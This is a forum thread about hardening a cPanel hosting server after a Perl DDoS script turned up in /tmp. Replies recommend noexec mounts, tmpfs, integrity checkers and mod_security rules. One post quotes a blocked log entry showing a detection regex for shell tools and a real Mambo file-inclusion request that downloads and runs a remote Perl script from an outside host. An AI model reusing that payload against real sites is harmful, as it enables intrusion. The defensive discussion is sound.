# malicious script in /tmp - cpanel

## ddaas

Hi,

I have a hosting server (cpanel/whm) with almost 500 accounts.

Till now no security incidence has occurred. Yesterday I found out a perl script in /tmp directory which lunched some sort of DDoS attack ( It sent 20Mbs to different networks on the internet).

Please tell me some guidelines about the way I could protect my server in the future from these kind of attacks. (What could I do, are there any "harden tools" for /tmp etc)

Thanks

----------

## MrUlterior

 *ddaas wrote:*   

> Hi,
> 
> I have a hosting server (cpanel/whm) with almost 500 accounts.
> 
> Till now no security incidence has occurred. Yesterday I found out a perl script in /tmp directory which lunched some sort of DDoS attack ( It sent 20Mbs to different networks on the internet).
> ...

 

/tmp should be:

1. A separate partition, to prevent an attacker flooding it with data in order to kill your syslogd

2. mounted with "noexec" option in your /fstab

But /you/ have a bigger problem: you've scripts running insecurely or a vulnerable version of PHP and/or Apache, this needs to be addressed immediately. You can validate this by seeing who owned the file in /tmp, if it's apache or nobody you know the source of your probs. Personally, I'd pull that server IMMEDIATELY and rebuild it eyeballing everything and ensure I have AIDE/Tripwire and Logwatch to ensure rootkits aren't present.

I'd also highly recommend you get a little more clued up on the subject, it's your responsiblity if you're running any sort of server. Begin with replacing your standard kernel with a hardened one and chrooting your services.

----------

## ddaas

Hi there,

Thanks for your advices.

That is not my server and I don't know exacly how it was configured. A fried of mine who runs this hosting service asked me to help him harden his server.

The problem is that it uses cpanel for its management. 

After I searched around I found the following:

- the installation started from a "minimal  installation". Then cpanel has installed everything (exim, apache, php etc). It manages everything on that system (user accounts, updates, backup etc). I don't like this automatically scripts like cpanel, webmin etc. You have no flexibility and you have to do everything from their interface. Otherwise things could get messed. I would prefer a "by hand solution" where the admin is in control. But maybe for a hosting solution this is preferable.

Anyway:

/tmp is on its own partition: /dev/sda6 on /tmp type ext3 (rw,noexec,nosuid) [/tmp]

noexec and nosuid don't help in not running a perl scripts. It is world written because it is needed by some services (apache, mysql etc) and I think it needs to remain this way. Sticky bit is set.

I've installed AIDE, rkhunter, chkrootkit, log management system etc. Apache, php, mysql etc are stable and updated (not the last version, but a version without major known bugs). I will also set a firewall not to allow outbound connections.

The problem is that there are 2-300 hundred user hosting accounts and every user is responsible for   the content of its site, scripts etc. Practically everyone could copy/install anything in its /home  directory. 

I'll try to find who owned that Perl script. Let's suppose (and I suppose) that apache owned that script. What could I do to prevent something similar?

Thanks

----------

## ddaas

I found out that mod_security is a nice peace of software for protecting a web server. - http://www.modsecurity.org/

I does a lot of nice things and it is easy to be used.

I think it will also be useful to protect /tmp from malicious scripts.

If anyone use it, I would like to see some rules examples to protect /tmp and other directories from uploading and executing malicious scripts.

Thanks

----------

## kamikaze04

I use mod_security in all my servers. You can find some perfectly usable rules in www.gotroot.com -->download --> security tools

 :Smile:  This module has saved me some ocasions when a vulnerability appears and i don't patched it inmeditly...it cutted malicious scripts.  :Smile: 

----------

## ddaas

Hi,

I have already set up the rules from gotroot.com

I started with all rules from all files and httpd consumed more that 50% cpu and a lot of RAM. I was afraid that the whole server will crash. Now I don't use  badip and blacklist and everything works acceptable.

How do you use the rules from gotroot? Do you use all of them? How loaded is your server?

Do you automatically update them from www.gotroot.com or do you manually verify every rule?

Thanks

----------

## kamikaze04

Hi,

My servers usually don't have lots of visits per second. But when it does mod_security made my server processor go really "busy". The solution is that the rules from gotroot.com are general and you must addapt for your needs. Go through all the files and delete everything you don't need. Blacklist ip's are very heavy. You could check also another rules.

For example 95% of times, the rule that is more used in my servers is this one

apache2[16898]: [error] [client 1.1.7.154] mod_security: Access denied with redirect to [http://www.google.com]. Pattern match "(\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ |\\./|whoami|killall |rm \\-[a-z|A-Z]))" at THE_REQUEST [hostname "xxx.xxx.xx.es"] [uri "/~xxxxx/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://gothicangel.photojerk.com/~abt/cmd.txt?&cmd=cd%20/tmp;wget%20http://gothicangel.photojerk.com/~abt/mambus.txt;perl%20mambus.txt;rm%20-rf%20mambus.txt"]

which avoids using wget, python, perl etc...wich are the usual way of exploiting vulnerablilties. There is an example.

You problably won't need lots of the rules...it is just a bit of work the first time. After all, you can update your rules  with calm, because the really important rules are always the same

----------

## kamikaze04

You probably find usefull this web:

http://www.directadmin.com/forum/showthread.php?threadid=11125

----------

## CodAv

I'm using a RAM disk on my servers and desktop for /tmp. This has several advantages, the only major drawback is that it consumes some memory on heavily used machines, depending on your maximum size setting (but just as much as needed to store the files). To make /tmp a RAM disk, just empty the folder (stop all unneeded services and programs first!) and add this line to your /etc/fstab:

```
tmpfs                   /tmp            tmpfs           nodev,noexec,nosuid,size=100M,mode=1777      0 0
```

Change the size option to match your requirements and RAM size. I have about 30 customers on my web server, and the /tmp folder contains about 1 MB files on average (except some short peaks).

----------

